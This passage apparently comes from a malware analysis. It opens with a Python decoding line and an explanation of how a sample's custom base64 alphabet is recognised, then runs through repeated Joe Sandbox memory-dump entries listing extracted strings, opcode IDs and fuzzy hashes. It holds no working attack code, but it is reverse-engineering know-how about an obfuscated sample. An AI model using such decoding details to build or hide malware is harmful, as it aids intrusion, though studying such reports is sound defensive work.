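    print(decode(t, b"R3VMb2FkZXI="))  # constructed input
```

Compared against the record: bytes 0x00 to 0x2A are 43 fillers, `+` (0x2B) decodes to 62 (`>`), `/` (0x2F) to 63 (`?`), the digits to 52 to 61 (`456789:;<=`), and the 4-byte slices starting at `h` are exactly `!"#$`, `%&'(`, `)*+,`, `-./0`, `123@`, which is the sequence the report lists. A table that uses a different filler (0xFF is common) is recognised the same way, since the check reads the filler from byte 0.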
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                        • API String ID: 0-1002149817
                                                                        • Opcode ID: 42b9f4e00552d7998826f413b796e1cdc611bfaff3b8131e4987ab83d8a3cf70
                                                                        • Instruction ID: 61abcd4c44fd19691289c110cb82e06fa8c0bf7f14fb5c693d0a57dc3f9c17af
                                                                        • Opcode Fuzzy Hash: 42b9f4e00552d7998826f413b796e1cdc611bfaff3b8131e4987ab83d8a3cf70
                                                                        • Instruction Fuzzy Hash: 38C12EB5C11328AADB61DFA4DD44BDEBBB8AF05304F1081DAD50CBB241E7B54A88CF65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "+$"3$0$3M$90$;$<$?y$A3$B$KK$\$^^$a?$b$gE$h$m)$n9$p>$pG$rj$uS$|~$/$]$m
                                                                        • API String ID: 0-1871129808
                                                                        • Opcode ID: 6f5d70e8a0bf28d8f3088fb4ea79454088ab5fcf0ed5798843d95562c0e517f9
                                                                        • Instruction ID: cbc069d1c9688a3d7a781815cf6abd72fbbcea0aa823d0a689ba26b400d4817d
                                                                        • Opcode Fuzzy Hash: 6f5d70e8a0bf28d8f3088fb4ea79454088ab5fcf0ed5798843d95562c0e517f9
                                                                        • Instruction Fuzzy Hash: BBA126B0C05669CBEB61CF41C9987CEBBB5BB05308F5085D9C5483B281CBBA1B89CF95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                        • API String ID: 0-392141074
                                                                        • Opcode ID: 83d404f9d06bca929fa1fcf404f903674f664345cd3641426b3b1020bb13d96f
                                                                        • Instruction ID: b2031cda590fed61cc5c7e04c5771ac15a72804c56fa7ed632f63a378a41a020
                                                                        • Opcode Fuzzy Hash: 83d404f9d06bca929fa1fcf404f903674f664345cd3641426b3b1020bb13d96f
                                                                        • Instruction Fuzzy Hash: E1712EB5C50718AADB26EBE4CC40FEEB77DBF48701F04419DE518AA140EB715B488FA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                        • API String ID: 0-685823316
                                                                        • Opcode ID: a466c346cc4a16777437d9f339a8f4229519cb47871fb1c1223e42f9ebb64d18
                                                                        • Instruction ID: 7cf85f75dba6f85960d9b302cdaaa35ef5ea16e95418e4447dbb31a63f451657
                                                                        • Opcode Fuzzy Hash: a466c346cc4a16777437d9f339a8f4229519cb47871fb1c1223e42f9ebb64d18
                                                                        • Instruction Fuzzy Hash: CB3181B5D50318AAEF50DFE4CC44BEEBBB9BF08704F04425CE518BB180DBB516488BA8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2$B$F$G$N$O$]$j$w
                                                                        • API String ID: 0-1040731978
                                                                        • Opcode ID: 7210076507284f15942e4cf1ad312c589d45197e70ff81a55555d79cdec020c0
                                                                        • Instruction ID: 3de4716a4aac915a96226508add80d23c7d3e49e9c35e77035358e8a00cd7574
                                                                        • Opcode Fuzzy Hash: 7210076507284f15942e4cf1ad312c589d45197e70ff81a55555d79cdec020c0
                                                                        • Instruction Fuzzy Hash: D111DE60D1C7CAD9DB12C7BC84046AEBF715F13228F0882D9D5E42B2D2C2B94706DBA6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                        • API String ID: 0-620024284
                                                                        • Opcode ID: 8dc99e8969a681838e578b5bd6c0733433eee2398cc79a3174b6aabb256fe285
                                                                        • Instruction ID: 2aa09cdda43fccdf86a579f6901ace67f79381b863ffec1affd976a9943b262a
                                                                        • Opcode Fuzzy Hash: 8dc99e8969a681838e578b5bd6c0733433eee2398cc79a3174b6aabb256fe285
                                                                        • Instruction Fuzzy Hash: CF4193BAC10318BADB21EBA4DC40FDA7779AF45300F00859DA509AB140EBB49B488FA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !$@MSJ$@MSJ$F[HQ$GM@U$S$WRWF$}
                                                                        • API String ID: 0-2245592833
                                                                        • Opcode ID: a9ceaada0cefef7e545ff48661fe9cc00ff8aadd23d3314ff585706100d8a8c6
                                                                        • Instruction ID: db00598a820bcea8e0383fad33c3b8caf8f261f25c328ea25cc32dff0f1ae95e
                                                                        • Opcode Fuzzy Hash: a9ceaada0cefef7e545ff48661fe9cc00ff8aadd23d3314ff585706100d8a8c6
                                                                        • Instruction Fuzzy Hash: 82310DB0D45298AACB14CFD0DA412EEBFB0EB05304F61855CC51ABF601D7769A52CF9A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L$S$\$a$c$e$l
                                                                        • API String ID: 0-3322591375
                                                                        • Opcode ID: e6ab931d446092fced8b124636bf90d359690adc171833196a9697c414dd6c59
                                                                        • Instruction ID: 82b482bba6a87403e7fde240f37e01cf86c318caff8c00ef5ed54ae1bdf7215f
                                                                        • Opcode Fuzzy Hash: e6ab931d446092fced8b124636bf90d359690adc171833196a9697c414dd6c59
                                                                        • Instruction Fuzzy Hash: 04419976C10218BACB50DFE5DC84BDFB7F9EF84301F15465EE909AB200D7B155448B94
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: F$P$T$f$r$x
                                                                        • API String ID: 0-2523166886
                                                                        • Opcode ID: 76a3202e3da23e32ad658779fd99e1f96f74c36cdc3b7c2cb96ad32219d9077a
                                                                        • Instruction ID: aa1a8c360500179ed21784245cc4d54b37a81df9e01597019cd42a72cf0816a6
                                                                        • Opcode Fuzzy Hash: 76a3202e3da23e32ad658779fd99e1f96f74c36cdc3b7c2cb96ad32219d9077a
                                                                        • Instruction Fuzzy Hash: 5D51C171D44305EAEB25DFA4CD48BABF7F8EF16700F04465DE449AA280D3B4A588CFA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $22.&$e$h$o
                                                                        • API String ID: 0-4050626514
                                                                        • Opcode ID: 6ad97a0ef18ffdb0a8e074ceb63e0b2c2a09f54495d1a9155dd90af9c4ac186b
                                                                        • Instruction ID: adea9512667fb1f5741d7c976cc8058475e2f85c30cbab6919f960c6054fee76
                                                                        • Opcode Fuzzy Hash: 6ad97a0ef18ffdb0a8e074ceb63e0b2c2a09f54495d1a9155dd90af9c4ac186b
                                                                        • Instruction Fuzzy Hash: C48165B6D103187ADB65EBA4DC45FEF737DEF49200F00419EA509AA140EB745B888FA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $e$k$o
                                                                        • API String ID: 0-3624523832
                                                                        • Opcode ID: ddb48f4dad444aef318c310d4304ebe094a46bcfe36c38e74dc93c18250fc283
                                                                        • Instruction ID: 7b9a29e204d2ce2e0b32cb830ff16a296eb81f1257564421193f74b345c62e9d
                                                                        • Opcode Fuzzy Hash: ddb48f4dad444aef318c310d4304ebe094a46bcfe36c38e74dc93c18250fc283
                                                                        • Instruction Fuzzy Hash: 77B10AB5A00308AFDB24DBA4CD85FEFB7FDAF89700F148558E619A7280D775AA41CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                        • API String ID: 0-2877786613
                                                                        • Opcode ID: b873b6dcbcdaf5eb66698c0d79f234267d372b755d34f07e5ec97343f658fcb0
                                                                        • Instruction ID: 64fc64344cf210db52183ef4db121d7685ec1368793ad07764fcddce79006758
                                                                        • Opcode Fuzzy Hash: b873b6dcbcdaf5eb66698c0d79f234267d372b755d34f07e5ec97343f658fcb0
                                                                        • Instruction Fuzzy Hash: B7414F75D512187EEB01EBD1CC41FFF7B7C9F96700F004048FA146A281D7B4AA1587AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                        • API String ID: 0-2877786613
                                                                        • Opcode ID: d1e4cb8a1cd9b945f2a9167e0fe92997f972ada649dd1345bdfb2ebb4f84d0b4
                                                                        • Instruction ID: a50243684f70f6757c45e4ac24923e992bf3e8651be8fff47b8e14a7b9e3389b
                                                                        • Opcode Fuzzy Hash: d1e4cb8a1cd9b945f2a9167e0fe92997f972ada649dd1345bdfb2ebb4f84d0b4
                                                                        • Instruction Fuzzy Hash: 5C313075D512187AEB01EBD5CC41FEF7B7C9F96700F004048FA146A281E7B4AA1587EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @MSJ$@MSJ$WRWF$}
                                                                        • API String ID: 0-3893029086
                                                                        • Opcode ID: d770e76913523d9a0e6f9e7fb87dacc2061b48b81cf5bb6f09eaf32ca8916fdc
                                                                        • Instruction ID: 53dece8c3ba8a53f3676fb77188e2468869f30c1199e5f1dffd4b3640a1ebf22
                                                                        • Opcode Fuzzy Hash: d770e76913523d9a0e6f9e7fb87dacc2061b48b81cf5bb6f09eaf32ca8916fdc
                                                                        • Instruction Fuzzy Hash: E131ECB1D452889ACB20CFE5DA842DEFFB1BB04214F65865CC02A7F641CB365646CF99
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @MSJ$@MSJ$WRWF$}
                                                                        • API String ID: 0-3893029086
                                                                        • Opcode ID: 148b59ae8278dedfcc3aacbd89a4a2b3657992f201311d6deb714e2bb7a628c0
                                                                        • Instruction ID: 4282ba3b1e0792db67c1c31c8734993fe2ac1c6943069f1b6dfaae51aaebb901
                                                                        • Opcode Fuzzy Hash: 148b59ae8278dedfcc3aacbd89a4a2b3657992f201311d6deb714e2bb7a628c0
                                                                        • Instruction Fuzzy Hash: 1A110FB1C45288DACF14CFC1DA802DEBFB0FF09614FA58948D5167F601CB3A5A528F9A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "3G$0:$HD$ZI|n
                                                                        • API String ID: 0-3571891404
                                                                        • Opcode ID: 8b21d6adb2704bcb7510e9a72687f1609da77863edf2c5f4b6906bfa7c850a13
                                                                        • Instruction ID: 10aaa8b74fbecb7b2f9b51f336f3a75b2d8f595e9d1576cd3e69b2763818cd26
                                                                        • Opcode Fuzzy Hash: 8b21d6adb2704bcb7510e9a72687f1609da77863edf2c5f4b6906bfa7c850a13
                                                                        • Instruction Fuzzy Hash: E6F069B1D51318ABEB10FFD9C9019DEBB78EF1A300F504048E9503B241E7B04A508BEA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "3G$0:$HD$ZI|n
                                                                        • API String ID: 0-3571891404
                                                                        • Opcode ID: 1baf609e2e7e62307b4c6765a7af676f0a15956ff22ac2eb8ba13b83bab2f53f
                                                                        • Instruction ID: 2db12d1b0b48e4056ad9b92161cb34c4708a40679000b9ca172ef66217ecec1c
                                                                        • Opcode Fuzzy Hash: 1baf609e2e7e62307b4c6765a7af676f0a15956ff22ac2eb8ba13b83bab2f53f
                                                                        • Instruction Fuzzy Hash: A30169B1D51228AFEB11EFC5C9419DEBB78EF1A300F554148E9117F242D7B04A008FE6